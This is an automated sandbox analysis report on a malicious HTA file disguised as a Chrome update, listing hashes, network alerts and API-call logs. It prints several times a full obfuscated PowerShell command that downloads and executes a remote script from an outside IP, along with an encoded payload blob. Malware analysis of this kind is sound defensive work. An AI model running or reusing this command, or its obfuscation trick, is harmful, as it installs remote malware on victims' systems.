popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Chrome Setup Update.google.hta

Generic Malware Antivirus AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 24, 2022, 9:44 a.m. May 24, 2022, 9:46 a.m.
Size 12.5KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 552ce288a0c4bd91716eb555bfb5ec4f
SHA256 f74fc51b964225de15f894837a6074f682fe1ec56c140909f58fb75b978d6569
CRC32 3A380883
ssdeep 192:SxZxtgsWI7Z17rnaskIwuQXipWt9M3TmS0h/lzQcnk9:SxZ/gdkZJDas7QXipWvM3CtFnk
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
31.41.244.231 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 31.41.244.231:80 -> 192.168.56.102:49168 2035769 ET HUNTING [TW] Likely Hex Executable String Misc activity
TCP 31.41.244.231:80 -> 192.168.56.102:49168 2020482 ET WEB_CLIENT DRIVEBY GENERIC ShellExecute in Hex No Seps A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003aa840
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b8330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b8330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003b8330
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860400
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860400
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8604e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8604e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8604e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8604e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860860
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860860
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860860
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8604e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8604e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8604e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860da0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860f60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860f60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860f60
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860fd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860fd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b860be0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b861040
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b861040
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b861040
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b861120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b861120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b861120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b861120
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b88eec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b88eec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://31.41.244.231/AVAVA/WAW/F0.oo
request GET http://31.41.244.231/AVAVA/WAW/F0.oo
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 812
region_size: 9900032
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ef0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003860000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 812
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa7c7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef7019000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003860000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 812
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4263936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2328
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003020000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/31.41.244.231/AVAVA/WAW/F0.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');IEX $TC|IEX
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/31.41.244.231/AVAVA/WAW/F0.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');IEX $TC|IEX
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/31.41.244.231/AVAVA/WAW/F0.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');IEX $TC|IEX
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received r//+cAAAAF/H///3o//9u6///SQgAABUGAACx7///5wEAAPj2//8RCgAAH+v//6D3///bBgAAKAYAAJ0IAAAx+f//k/b//wb3//+49P//OfP//zYGAABH+f//BfT//1z4///J7///tgEAAC/o//+cBgAAeAEAAA/y//9P7///SAEAALECAABP9///KQ8AACCCAQAAOGn5//8RIR4RLpwfGDhc+f//FhMXIJsBAAA4T/n//xEPERQRFI5pFwhYWZFgEw8gsAAAADg5+f//H0wfTVgTHCDRAAAAOCT5//8RCB8KIIcAAAAfLVmcIJQBAAATMzjnEAAAOQj5//8RCBsgkwAAAB8xWZwfHzj3+P//ESEfDwmcIBQBAAATMzjHEAAAOlALAAA42fj//xEhHxAgkwAAAB8rWJwgLQEAADjA+P//ERA4qRAAACAWAQAAOK/4//8RIRwJnB8KEzM4mxAAADnr7f//OJn4//8RFhETP9MGAAAg8wAAABMzFjmD+P//ESEfEx9wHyBYnB9SEzM4cPj//xEIGh8uHwtZnCCEAAAAEzM4XRAAADpW+P//IKwAAAAfOVkTHBY4RPj//xEhHx0goAAAAB81WZwg1QAAABMzOC34//8gnAAAAB80WRMuIIkAAAA4F/j//xEhHREunCCXAAAAEzM4ExAAADk78P//OP33//8RGhEZGVjgkR8YYhEaERkYWOCRHxBiYBEaERkXWOCRHmJgERoRGeCRYBMXH3cTMzjfDwAAOp/z//84v/f//xEhHxkRLpwgBQEAADiw9///IIsAAAAfLlkTLiAaAQAAOJz3//8WEzEfIRMzOI73//8RCBwRHJwg/AAAADh89///EQYfDxEJHZGcIHIBAAA4bff//yDuAAAAHlgNIKMAAAA4V/f//yCDAAAAHxlYDSC8AAAAEzMXOkP3//8RIR8YH28fNFicIPcAAAATMxc6LPf//yD5AAAAH1NZDSBtAQAAEzMWORb3//8RIR8XILoAAAAfPlmcIHUBAAA4Aff//xEIFxEcnCCbAAAAEzM4DQ8AADno9v//ILkAAAAfPVkTLiCXAQAAEzM40vb//xEhHw8RLpwfRTjG9v//IKQAAAAfNlkTLiDPAAAAEzMWOa32//8RCBkRHJwgqQAAABMzOJv2//8RJh5iEyYgmQEAADiJ9v//H3ofIlkTLiC3AAAAOHj2//8RGBEGjmk/aOT//yAqAQAAEzMWOWL2//8fdx1YExwgawEAADhU9v//ESEXINgAAAAfSFmcH30TMzhnDgAAOTj2//8RCB8PIIUAAAAfLFmcIKQAAAA4H/b//xEIEwYgqgAAADgV9v//EQgfCSCLAAAAHy5ZnCBxAQAAOPr1//8RCBgRHJwfQjjt9f//EQ0RLRlYETAgAAAA/18fGGTSnCAeAQAAEzM4BA4AADkC5f//OMb1//8ffB9JWA0giAAAADi49f//EQgfCREcnCCzAAAAOKf1//8RCjjcDQAAGxMzON4NAAA5kfX//xEIHwkRHJwfKBMzFzqA9f//EScRJxMEIMbWU3MTBSAcRmxDEyogm+E4PBMVIN2hGnUTGyAbGRYwEysRFXZsIwAAAAAAAAAAMwYRFRdZExURG2hsERV2bFsRFXZsWG0THSD1nzBVEQVYER1YIPWfMFVYExURKhEFWRMqEQUgVVVVVV8THhEFIKqqqqpfEwsRHhdkEQsXYmARFVgTHhEFHwtkEQUfFWJgEwUgefa1ABEqH39fWhEqHWRZEyogXhzZAREVH39fWhEVHWRYExUggrwAABEVWhEqWBMVIDtzsAcRFVpuEyARIBdqYBMgESsRK1puESBebRMrEQQRBBxiYRMEEQQRBVgTBBEEEQQfFWRhEwQRBBEbWBMEEQQRBB8NYmETBBEEEStYEwQRBRxiERVYERthEQRYEwQRBHZsbVgTJx8ZOEv0//8RCB0fYR8kWZwgfwEAABMzOIYMAAA6L/T//x9MHw5YExwgkQAAABMzOBz0//8RIRwRLpwg5wAAADgK9P//ESEfHQmcIGIBAAA4/vP//x9QHxBYEy4g/gAAABMzOEUMAAA6kQcAADjf8///GR82WA0fEjjR8///HykfSlgTHB8gEzMXOsLz//8fPh9FWBMuIIoBAAATMziv8///EQgdIKgAAAAfOFmcH0w4nvP//xEhHxwJnB9UOI3z//8RIRkJnCDyAAAAEzM4fvP//xEhHxURLpwgOQEAADhr8///FhMSICUBAAA4XvP//yCAAAAAH09ZDSDhAAAAOEvz//8fPx9CWBMcHz04QfP//yCQAAAAHzBZExwfVzgw8///HxcfDFgTLiBPAQAAOB/z//8RCB8PIIEAAAAfUFicHzU4B/P//xEhFyCxAAAAH0NZnCC+AAAAEzM4VwsAADrs8v//ESEfGBEunCBbAQAAEzM42fL//xExHlgTMSC6AAAAOMvy//8RIR8UCZwgkwAAADi78v//H3AfYFgNIL8AAAATMzin8v//ESEfFwmcHw84mPL//xEhGREunCASAQAAEzMWOYfy//8RIR8dHyQfIlicIM4AAAA4dfL//xEhFx9pH2NYnCAYAQAAEzMXOl3y//8RIR8VIIgAAAAfWVmcIP8AAAATMxY5Q/L//xEIHw0g/QAAAB9UWZwfZhMzOJ0KAAA5MOL//zgj8v//ESEfGh9sHyRZnCDiAAAAOBHy//8RCB8OERycID4BAAATMzh2CgAAOffx//8giwAAAB8uWRMcIAwBAAATMxc64PH//xEIFxEcnCDZAAAAONLx//8REhEPYRMkHzY4wPH//zgk+f//ERYWPjDr//8grAAAADit8f//IOEAAAAfS1kTHCDpAAAAOJXx//8YH2VYEy4fZBMzFzqH8f//ESEfEx9HFlicHyU4dfH//xEhHxAJnCB+AQAAEzM46QkAADpg8f//EQgaINkAAAAfSFmcH3ITMxY5SvH//xEhHwsgjQAAAB8vWZwggwEAABMzOL8JAAA6LPH//x93Hz1YDR9aEzM4HfH//xEhHiDeAAAAH0pZnCArAQAAOAXx//8fWBZYDSAjAQAAEzM49vD//xEhHxsRLpwgmAAAADjj8P//EQgcERycHzA41vD//x8QjSIAAAETCB9+OMrw//8R